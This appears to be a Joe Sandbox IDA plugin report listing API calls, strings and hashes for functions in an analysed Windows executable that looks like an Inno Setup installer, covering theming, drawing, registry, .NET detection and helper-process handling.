                                                                                                    • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                    • API String ID: 1968650500-2910565190
                                                                                                    • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                    • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                                    • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                    • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0041CA40
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                                    • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                                    • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                                    • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                                    • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                                    • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                                    • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                                    • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                                    • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                                    • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                                    • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                                    • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                                    • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                                      • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 269503290-0
                                                                                                    • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                    • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                                    • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                    • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                                    • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                                    Strings
                                                                                                    • CoCreateInstance, xrefs: 004566AF
                                                                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                                    • IPropertyStore::Commit, xrefs: 004568E3
                                                                                                    • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                                    • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                                    • {pf32}\, xrefs: 0045671E
                                                                                                    • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                                    • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                                    • IPersistFile::Save, xrefs: 00456962
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInstance$FreeString
                                                                                                    • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                                    • API String ID: 308859552-2363233914
                                                                                                    • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                    • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                                    • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                    • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                                      • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                    • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                    • API String ID: 2000705611-3672972446
                                                                                                    • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                    • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                                    • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                    • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                    • API String ID: 1452528299-3112430753
                                                                                                    • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                                    • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                                    • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                                    • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                                      • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                    • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                    • API String ID: 59345061-4263478283
                                                                                                    • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                    • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                                    • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                    • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                                    APIs
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                                    • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                                    • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                                    • GetDC.USER32(00000000), ref: 0041B402
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                    • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                    • String ID:
                                                                                                    • API String ID: 644427674-0
                                                                                                    • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                    • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                                    • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                    • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                                    • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                                    • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                                    • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                    • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                    • API String ID: 971782779-3668018701
                                                                                                    • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                    • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                                    • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                    • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                                      • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                    • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                                    • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                                    • RegOpenKeyEx, xrefs: 00454910
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                                    • , xrefs: 004548FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue$FormatMessageOpen
                                                                                                    • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                    • API String ID: 2812809588-1577016196
                                                                                                    • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                    • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                                    • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                                    • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                                                                    Strings
                                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                                                                    • .NET Framework version %s not found, xrefs: 00459609
                                                                                                    • .NET Framework not found, xrefs: 0045961D
                                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                                                                    • v4.0.30319, xrefs: 004594F1
                                                                                                    • v1.1.4322, xrefs: 004595C2
                                                                                                    • v2.0.50727, xrefs: 0045955B
                                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$Open
                                                                                                    • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                    • API String ID: 2976201327-446240816
                                                                                                    • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                    • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                                                                    • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                                                                    • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
APIs
• CloseHandle.KERNEL32(?), ref: 00458A7B
• TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
• WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
• GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
• CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
• Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
Strings
• Helper isn't responding; killing it., xrefs: 00458A87
• Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
• Helper process exited., xrefs: 00458AC5
• Helper process exited, but failed to get exit code., xrefs: 00458AEF
• Helper process exited with failure code: 0x%x, xrefs: 00458AE3
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
• String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
• API String ID: 3355656108-1243109208
• Opcode ID: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
• Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
• Opcode Fuzzy Hash: 8d11a9d6b8ebfffa9e94c3bd241da5180e5b7166b03f76cd8ec90a905d120898
• Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
APIs
  • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
  • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
Strings
• RegCreateKeyEx, xrefs: 004545C3
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
• , xrefs: 004545B1
• Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
